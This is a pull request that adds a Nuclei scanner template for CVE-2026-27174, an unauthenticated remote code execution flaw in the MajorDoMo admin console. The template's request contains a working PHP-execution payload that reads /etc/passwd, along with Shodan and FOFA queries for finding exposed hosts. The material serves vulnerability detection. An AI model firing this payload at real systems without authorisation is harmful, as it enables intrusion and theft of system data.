### PR TITLE
Add CVE-2026-27174 - MajorDoMo - Unauthenticated RCE (KEV)

### DIFF
--- a/http/cves/2026/CVE-2026-27174.yaml
+++ b/http/cves/2026/CVE-2026-27174.yaml
@@ -30,10 +30,26 @@ info:
     shodan-query: http.html:"templates/application.html"
   tags: cve,cve2026,rce,majordomo,php,unauth
 
+flow: http(1) && http(2)
+
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/admin.php?ajax_panel=1&op=console&command=echo+file_get_contents%28%27%2Fetc%2Fpasswd%27%29%3B"
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code == 200"
+          - "contains_all(body, 'MajordomoSL', 'templates/application.html', 'majordomo')"
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        GET /admin.php?ajax_panel=1&op=console&command=echo+file_get_contents%28%27%2Fetc%2Fpasswd%27%29%3B HTTP/1.1
+        Host: {{Hostname}}
 
     matchers-condition: and
     matchers:

--- a/http/cves/2026/CVE-2026-27174.yaml
+++ b/http/cves/2026/CVE-2026-27174.yaml
@@ -1,0 +1,47 @@
+id: CVE-2026-27174
+
+info:
+  name: MajorDoMo - Unauthenticated RCE
+  author: 0x_Akoko
+  severity: critical
+  description: |
+   MajorDoMo contains a remote code execution caused by an include order bug and lack of exit after redirect in admin panel's PHP console, letting unauthenticated attackers execute arbitrary PHP code via crafted GET requests.
+  impact: |
+   Unauthenticated attackers can execute arbitrary PHP code remotely, potentially leading to full system compromise.
+  remediation: |
+   Update to the latest version with the fix for the include order bug and proper exit after redirect.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-27174
+    - https://github.com/sergejey/majordomo/issues/1177
+    - https://chocapikk.com/posts/2026/majordomo-revisited
+    - https://www.vulncheck.com/advisories/majordomo-unauthenticated-remote-code-execution-via-admin-console-eval
+  classification:
+    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
+    cvss-score: 10.0
+    cve-id: CVE-2026-27174
+    cwe-id: CWE-94
+    cpe: cpe:2.3:a:sergejey:majordomo:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: sergejey
+    product: majordomo
+    fofa-query: body="templates/application.html"
+    shodan-query: http.html:"templates/application.html"
+  tags: cve,cve2026,rce,majordomo,php,unauth
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/admin.php?ajax_panel=1&op=console&command=echo+file_get_contents%28%27%2Fetc%2Fpasswd%27%29%3B"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:[x*]:0:0:"
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
Added CVE-2026-27174 entry detailing unauthenticated RCE in MajorDoMo.

### PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
- References:

### Template validation

<!-- Clarifies if the valdation of the template was done on an actual system for which the template was developed -->
<!-- If this concerns a vulnerability check, please clarify if validation was done on a known vulnerable system and optionally on a known not vulnerable system to avoid false positives -->

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details (leave it blank if not applicable)

<!-- Include `nuclei -debug` output along with Shodan / Fofa / Google Query / Docker or screenshots if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
